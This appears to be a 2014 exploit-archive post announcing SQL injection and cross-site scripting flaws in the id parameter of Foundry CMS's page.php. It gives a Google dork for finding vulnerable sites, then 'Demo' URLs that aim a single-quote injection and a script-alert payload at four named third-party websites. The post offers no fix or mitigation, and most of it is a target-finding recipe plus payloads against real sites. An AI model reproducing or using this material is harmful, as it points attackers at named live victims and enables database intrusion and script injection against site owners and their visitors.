facebook facebook twitter rss

Foundry CMS Multiple Vulnerability

Author: MeshoHk , Published: 15-09-2014
[+] Title: Foundry CMS Multiple Vulnerability
[+] Date: 2014/09/05
[+] Author: MeshoHk
[+] Tested on: Windows
[+] Vulnerable Files: /page.php
[+} Dork : intext:"Site by The Design Foundry"

### POC:
[+] Sql Injection: http://site/page.php?id=[SQL-Injection]
[+] XSS: http://site/page.php?id=[XSS]
### Demo:

[+] Sql injection: http://www.resonatehub.co.uk/page.php?id=1'
http://www.sutcliffe.co.uk/page.php?id=1'

http://www.warmerenergyservices.com/page.php?id=25'
http://www.my-maintenance.com/page.php?id=1'

[+] Xss: http://www.resonatehub.co.uk/page.php?id=
<script>alert(/xss/)</script>
http://www.sutcliffe.co.uk/page.php?id=

<script>alert(/xss/)</script>
http://www.warmerenergyservices.com/page.php?id=
<script>alert(/xss/)</script>
http://www.my-maintenance.com/page.php?id=

<script>alert(/xss/)</script>
### Credits:
[+] Special Thanks:Momenib &VirusGaza&Mahmod Sh

Like us on Facebook :